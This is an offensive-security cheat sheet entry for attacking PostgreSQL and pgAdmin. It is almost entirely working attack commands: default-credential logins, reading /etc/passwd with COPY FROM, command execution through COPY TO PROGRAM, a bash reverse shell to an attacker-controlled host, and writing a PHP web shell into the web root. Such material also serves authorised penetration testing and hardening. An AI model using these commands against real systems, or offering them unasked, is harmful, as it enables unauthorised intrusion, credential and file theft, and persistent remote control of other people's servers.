PostgreSQL / pgAdmin
What it is: Powerful open-source relational database. Unlike MySQL, PostgreSQL supports native command execution via COPY TO PROGRAM (v9.3+), making it a direct path to RCE when accessible.
Default ports: 5432 (PostgreSQL), 5050 (pgAdmin)
Vuln research:
Connect to PostgreSQL (port 5432)
Direct database access — Try default credentials
psql -h $IP -U postgres
# Default creds: postgres:postgres, postgres:(empty)
Command execution via PostgreSQL
COPY TO/FROM PROGRAM — Execute OS commands
-- Read files:
CREATE TABLE readfile(output text);
COPY readfile FROM '/etc/passwd';
SELECT * FROM readfile;
-- Execute commands (PostgreSQL 9.3+):
COPY (SELECT '') TO PROGRAM 'id';
-- Reverse shell:
COPY (SELECT '') TO PROGRAM 'bash -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"';
Write files via PostgreSQL
COPY TO — Write web shells
COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';
pgAdmin default credentials
Web interface for PostgreSQL — Often exposed
# Default: pgadmin4@pgadmin.org / admin
# Check: http://$IP:5050 or http://$IP/pgadmin